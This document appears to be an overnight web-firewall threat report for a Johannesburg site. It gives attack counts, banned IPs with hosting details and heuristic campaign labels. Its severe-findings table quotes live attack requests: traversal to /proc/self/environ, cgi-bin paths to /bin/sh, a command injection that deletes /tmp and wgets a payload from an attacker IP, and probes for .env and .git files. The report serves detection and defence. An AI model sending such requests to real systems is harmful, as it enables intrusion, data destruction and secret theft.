# Binteca Threat Map: night ending 2026-10-05

Window: 2026-10-04T18:00:00+02:00 to 2026-10-05T06:00:00+02:00 (UTC+02:00). Target point: Johannesburg, ZA.

## Totals

| Metric | Overnight |
|---|---:|
| Attacks at the edge | 2,344 |
| New bans at the edge | 43 |
| Attacks (all sensors) | 3,752 |
| New bans (all sensors) | 115 |
| Requests seen | 98,321 |
| Blocked at the edge | 3,087 |
| Active bans at report time | 33 |
| Sensors reporting | 4 |

| Sensor | Kind | Attacks | New bans | Active bans |
|---|---|---:|---:|---:|
| edge | edge | 2,344 | 43 | 23 |
| web-1 | web | 236 | 9 | 1 |
| web-2 | web | 139 | 21 | 1 |
| web-3 | web | 1,033 | 42 | 8 |

## Attack categories

| Category | Attacks |
|---|---:|
| secret-probe | 1,832 |
| cms-probe | 1,480 |
| code-injection | 168 |
| protocol | 145 |
| scanner | 97 |
| traversal | 22 |

## Banned identifiers

- IP addresses banned: **98** (115 ban actions)
- E-mail addresses banned: 0
- Other identifiers banned: 0
- The WAF bans network addresses only; no e-mail or account identifiers appear in the source.

| IP | Country | City | ASN / org | Attack types | Bans | Max offence | State | Tags | Suspected actor (confidence) |
|---|---|---|---|---|---:|---:|---|---|---|
| `45.138.12.28` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe, credential-probe | 2 | 1 | expired | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `34.140.132.132` | BE | Brussels | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `45.138.12.43` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | cms-probe | 1 | 1 | expired | abuse-prone-hosting, cluster:45.138.12.0/24 | Known-bad scanning infrastructure (medium) |
| `45.138.12.22` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | php-probe, credential-probe | 1 | 1 | expired | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `87.120.104.29` | NO | Sandefjord | AS211443 SINO WORLDWIDE TRADING LIMITED | credential-probe | 1 | 1 | active | spamhaus-drop, firehol-level1 | Suspected credential/secret-harvesting campaign (medium) |
| `34.156.22.151` | BE | Brussels | AS396982 Google LLC | credential-probe, secret-probe | 2 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `81.0.221.48` | GB | Portsmouth | AS51167 Contabo GmbH | rce-payload | 2 | 2 | active | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `34.187.18.72` | NL | Groningen | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.47.17.196` | CA | Montreal | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `104.244.74.39` | LU | Bissen | AS53667 FranTech Solutions | secret-probe | 2 | 2 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `185.19.40.244` | DE | Frankfurt am Main | AS210558 1337 Services GmbH | cms-probe | 1 | 2 | expired | spamhaus-drop, firehol-level1, repeat-offender | Known-bad scanning infrastructure (medium) |
| `81.171.74.60` | GB | London | AS34343 Eweka Internet Services B.V. | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `216.81.200.21` | US | Des Moines (Downtown Des Moines) | AS11320 LightEdge Solutions | secret-probe | 4 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `34.100.153.150` | IN | Mumbai | AS396982 Google LLC | rce-payload | 3 | 2 | active | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `49.0.202.115` | SG | Singapore | AS136907 HUAWEI INTERNATIONAL PTE. LTD. | rce-payload | 3 | 3 | active | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `223.83.183.254` | CN | Jinrongjie (Xicheng District) | AS56045 China Mobile Communications Corporation | rce-payload | 2 | 2 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `34.16.151.47` | US | Las Vegas | AS396982 Google LLC | secret-probe | 2 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.182.177.246` | US | Washington D.C. | AS396982 Google LLC | secret-probe | 2 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `34.50.26.28` | KR | Yongsan-dong | AS396982 Google LLC | secret-probe | 2 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `45.238.235.2` | BR | Ferraz de Vasconcelos | AS268350 R.R.COMUNICAÇÃO & MULTIMIDIA EIRELI | rce-payload | 2 | 2 | expired | repeat-offender | Suspected exploit/RCE bot (low) |
| `45.78.224.87` | SG | Singapore | AS150436 Byteplus Pte. Ltd. | rce-payload | 2 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `101.42.0.42` | CN | Beijing | AS45090 Shenzhen Tencent Computer Systems Company Limited | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `103.46.186.148` | ID | Utan | AS150462 PT Air Lintas Komunikasi | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `104.211.91.50` | IN | Pune | AS8075 Microsoft Corporation | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `124.158.13.141` | VN | Hanoi | AS38733 CMC Telecom Infrastructure Company | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `136.85.99.221` | SG | Singapore | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `144.225.6.184` | US | Las Vegas | AS7488 CNServer LLC | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `146.190.103.103` | SG | Singapore (Pioneer) | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `154.217.245.253` | US | Los Angeles | AS400619 AROSSCLOUD INC. | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `167.99.249.21` | DE | Frankfurt am Main | AS14061 DigitalOcean, LLC | secret-probe | 1 | 3 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `168.228.151.152` | BR | Minaçu | AS264953 INTEGRATO TELECOMUNICAÇÕES LTDA - ME | rce-payload | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `175.148.158.44` | CN | Shenyang | AS4837 CHINA UNICOM China169 Backbone | command-injection | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `178.128.151.198` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 3 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `178.211.139.240` | PL | Warsaw (Mokotów) | AS201814 MEVSPACE sp. z o.o. | php-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `184.105.247.195` | US | Fremont (East Industrial) | AS6939 Hurricane Electric LLC | secret-probe | 1 | 2 | active | research-scanner, repeat-offender | Internet research scanner (benign) (high) |
| `184.105.247.252` | US | Fremont (East Industrial) | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `184.154.245.42` | US | Miami | AS398991 X99 | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `185.226.197.69` | NL | Amsterdam | AS21859 Zenlayer Inc | cms-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `186.182.105.49` | PY | Ciudad del Este | AS11664 Techtel LMDS Comunicaciones Interactivas S.A. | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `187.108.1.142` | BR | Joinville | AS28267 SIM INTERNET PROVEDORES DE INTERNET EIRELI. | attack-tool | 1 | 1 | expired |  | Automated attack tool (low) |
| `187.17.228.218` | BR | Joinville | AS28267 SIM INTERNET PROVEDORES DE INTERNET EIRELI. | php-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `187.87.144.234` | BR | Mogi das Cruzes | AS262686 Netwalk Telecomunicações em Inf. Ltda | rce-payload | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `192.3.245.183` | US | Los Angeles | AS36352 HostPapa | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `193.47.62.168` | AD | Andorra la Vella | AS216014 BestDC Limited | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `195.178.110.159` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:195.178.110.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `195.178.110.199` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:195.178.110.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `196.189.236.67` | ET | Addis Ababa | AS24757 EthioNet | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `2.56.172.206` | PL | Warsaw | AS203273 NetCrafters OU | rce-payload | 1 | 2 | expired | repeat-offender | Suspected exploit/RCE bot (low) |
| `20.204.16.15` | IN | Pune | AS8075 Microsoft Corporation | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `20.210.186.186` | JP | Osaka | AS8075 Microsoft Corporation | php-probe | 1 | 4 | active | hosting-provider, repeat-offender | Suspected CMS exploitation bot (low) |
| `20.249.5.100` | KR | Yongsan-dong | AS8075 Microsoft Corporation | credential-probe | 1 | 2 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `206.189.233.36` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `209.99.187.10` | US | San Francisco | AS402253 SKN Subnet & Telecom Ltd | rce-payload | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Known-bad scanning infrastructure (medium) |
| `216.126.237.47` | US | Ogden | AS14956 RouterHosting LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `221.159.119.6` | KR | Seongnam-si (Jeongja-dong) | AS4766 Korea Telecom | command-injection | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `34.14.216.183` | IN | Mumbai | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.140.234.80` | BE | Brussels | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.142.253.246` | SG | Singapore | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.176.225.3` | CL | Santiago | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.18.32.39` | QA | Doha | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.186.110.67` | US | Washington D.C. | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.22.106.197` | KR | Yongsan-dong | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.22.117.21` | BE | Brussels | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.31.206.252` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.32.83.153` | DE | Berlin | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.34.217.140` | ID | Jakarta | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.39.67.13` | GB | London | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.64.237.210` | KR | Yongsan-dong | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.65.72.219` | CH | Zurich | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.75.105.13` | US | North Charleston | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.77.137.207` | BE | Brussels | AS396982 Google LLC | secret-probe | 1 | 3 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `35.222.122.52` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `35.225.33.58` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `35.234.7.208` | TW | Taoyuan | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `45.138.12.16` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 2 | expired | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.138.12.26` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 1 | expired | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.138.12.51` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 3 | active | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.138.12.9` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 2 | active | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.148.10.5` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `45.153.102.164` | IE | Bagenalstown | AS203020 HostRoyale Technologies Pvt Ltd | secret-probe | 1 | 4 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `45.156.87.131` | NL | Amsterdam | AS197170 TechTies Inc. | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Suspected credential/secret-harvesting campaign (medium) |
| `46.151.182.93` | DE | Frankfurt am Main | AS36680 Netiface LLC | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Suspected credential/secret-harvesting campaign (medium) |
| `64.62.156.172` | US | Pleasanton | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | active | firehol-level1, research-scanner | Internet research scanner (benign) (high) |
| `65.49.1.142` | US | Pleasanton | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | expired | firehol-level1, research-scanner | Internet research scanner (benign) (high) |
| `66.218.236.8` | US | Clever | AS11976 Fidelity Communication International Inc. | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `71.70.231.156` | US | Half Moon | AS11426 Charter Communications Inc | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `8.234.127.199` | IN | Mumbai | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `81.171.72.135` | NL | Haarlem (Oude Stad) | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired | cluster:81.171.72.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `81.171.72.93` | NL | Haarlem (Oude Stad) | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired | cluster:81.171.72.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `85.204.70.112` | FR | Paris | AS25369 Hydra Communications Ltd | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `89.126.211.166` | UZ | Tashkent | AS202660 "Uzbektelekom" Joint Stock Company | rce-payload | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `91.148.244.131` | NL | Haarlem (Oude Stad) | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `91.148.245.81` | AL | Tirana | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `93.123.109.101` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `94.154.43.135` | NL | Amsterdam | AS219502 Storm Industries LLC | secret-probe | 1 | 4 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:94.154.43.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `94.154.43.146` | NL | Amsterdam | AS219502 Storm Industries LLC | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:94.154.43.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `95.168.180.75` | GB | London | AS205544 LEASEWEB UK LIMITED | secret-probe, credential-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `95.173.222.8` | FR | Paris | AS212238 Datacamp Limited | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |

## Top sources by request count

| IP | Requests | Country | ASN / org | Status |
|---|---:|---|---|---|
| `45.138.12.28` | 156 | HK | AS218785 TC DATACENTER LIMITED | ban expired 04:18 |
| `34.140.132.132` | 156 | BE | AS396982 Google LLC | spared: shared address |
| `34.47.27.5` | 129 | CA | AS396982 Google LLC | spared: shared address |
| `45.138.12.43` | 125 | HK | AS218785 TC DATACENTER LIMITED | ban expired 00:00; spared: shared address |
| `45.138.12.22` | 109 | HK | AS218785 TC DATACENTER LIMITED | ban expired 00:59 |
| `87.120.104.29` | 108 | NO | AS211443 SINO WORLDWIDE TRADING LIMITED | banned until Mon 06:14 |
| `34.62.82.165` | 81 | BE | AS396982 Google LLC | spared: shared address |
| `34.156.22.151` | 77 | BE | AS396982 Google LLC | ban expired 02:34 |
| `34.53.212.113` | 74 | BE | AS396982 Google LLC | spared: shared address |
| `81.0.221.48` | 20 | GB | AS51167 Contabo GmbH | ban expired 02:45 |
| `34.187.18.72` | 19 | NL | AS396982 Google LLC | ban expired 01:43 |
| `34.47.17.196` | 11 | CA | AS396982 Google LLC | ban expired 21:14 |
| `104.244.74.39` | 8 | LU | AS53667 FranTech Solutions | banned until Mon 10:48 |
| `185.19.40.244` | 5 | DE | AS210558 1337 Services GmbH | ban expired 05:56 |
| `81.171.74.60` | 5 | GB | AS34343 Eweka Internet Services B.V. | ban expired 22:25 |

## Most severe findings

| Severity | Rule | Requests | Addresses | First | Example source | Example request |
|---|---|---:|---:|---|---|---|
| critical | Secret or VCS file probe (BW-SEC-01) | 1022 | 48 | 18:02 | `34.34.217.140` | `GET /.git/config` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 75 | 14 | 20:18 | `95.168.180.75` | `GET /wp-config.php.txt` |
| critical | Traversal to a system file (BW-TRV-01) | 18 | 2 | 22:27 | `34.81.122.81` | `GET /[@]fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw??` |
| critical | PHP or shell payload (BW-RCE-03) | 12 | 4 | 19:14 | `187.87.144.234` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 189 | 9 | 20:14 | `34.47.17.196` | `GET /.git/config` |
| critical | PHP or shell payload (BW-RCE-03) | 22 | 2 | 20:47 | `45.78.224.87` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 10 | 2 | 02:40 | `34.62.82.165` | `GET /database.sql` |
| critical | Secret or VCS file probe (BW-SEC-01) | 82 | 10 | 19:15 | `104.244.74.39` | `HEAD /.env` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 10 | 6 | 21:17 | `91.148.244.131` | `GET /storage/logs/laravel.log` |
| critical | PHP or shell payload (BW-RCE-03) | 8 | 3 | 23:18 | `89.126.211.166` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 407 | 15 | 20:46 | `20.204.16.15` | `GET /.env.local` |
| critical | PHP or shell payload (BW-RCE-03) | 123 | 19 | 18:07 | `168.228.151.152` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 37 | 5 | 23:59 | `45.138.12.22` | `GET /database.sql` |
| critical | Shell command injection (BW-RCE-02) | 3 | 2 | 23:25 | `175.148.158.44` | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175.148.158.44:…` |
| high | Run of missing-page requests (BW-BEH-01) | 4 | 4 | 23:37 | `35.205.88.64` | `GET /config.json` |
| high | Attack tool user agent (BW-UA-01) | 2 | 2 | 18:54 | `20.51.250.231` | `GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application` |
| high | Attack tool user agent (BW-UA-01) | 9 | 9 | 18:01 | `134.33.66.210` | `GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application` |
| high | Attack tool user agent (BW-UA-01) | 86 | 81 | 18:04 | `40.124.186.184` | `GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application` |
| medium | PHP script probe (BW-PHP-01) | 8 | 2 | 02:40 | `34.62.82.165` | `GET /api/phpinfo.php` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 15 | 3 | 23:00 | `45.138.12.43` | `GET /wp-login.php` |

## Indicators from payloads (defanged)

| Indicator | Port | Kind | Context | Seen from |
|---|---|---|---|---|
| `175[.]148[.]158[.]44` |  | payload-download-host | Shell command injection payload fetches / | `175.148.158.44` |

## Suspected actors and campaigns

Labels are heuristic groupings of infrastructure and behaviour, **not attribution**. See the README.

| Suspected actor / campaign | Confidence | Addresses | Top countries | Evidence |
|---|---|---:|---|---|
| Suspected credential/secret-harvesting campaign | medium | 61 | US 10, NL 7, HK 6, BE 6, AD 5 | hunts for .env, VCS or credential files; listed on Spamhaus DROP; listed on FireHOL level 1; AS218785 TC DATACENTER (abuse-prone hosting) |
| Suspected exploit/RCE bot | low | 18 | US 6, CN 2, GB 1, IN 1, SG 1 | sent a shell or PHP payload |
| Internet research scanner (benign) | high | 7 | US 5, SG 1, NL 1 | reverse DNS d3ecc9518c.scan.leakix.org; reverse DNS scan-14.shadowserver.io; reverse DNS scan-21b.shadowserver.io; reverse DNS zl-amsc-nl-gp6-wk117c.internet-census.org |
| Suspected Mirai-style IoT botnet | medium | 5 | BR 2, SG 1, CN 1, UZ 1 | IoT/router exploit path with a downloader typical of Mirai-family loaders |
| Unattributed automated probe | low | 4 | BE 2, CA 1, TW 1 |  |
| Suspected CMS exploitation bot | low | 4 | PL 1, BR 1, JP 1, FR 1 | CMS, admin panel or PHP script probing |
| Automated attack tool | low | 4 | US 3, BR 1 | request carried a known attack-tool user agent |
| Known-bad scanning infrastructure | medium | 3 | HK 1, DE 1, US 1 | listed on Spamhaus DROP; listed on FireHOL level 1; AS218785 TC DATACENTER (abuse-prone hosting); 7 addresses from 45.138.12.0/24 (AS218785) attacked the same night |

_Binteca Threat Map (https://cybermap.binteca.io), generated 2026-10-07T11:35:12Z from the overnight WAF summary. Geolocation: DB-IP Lite (CC BY 4.0)._
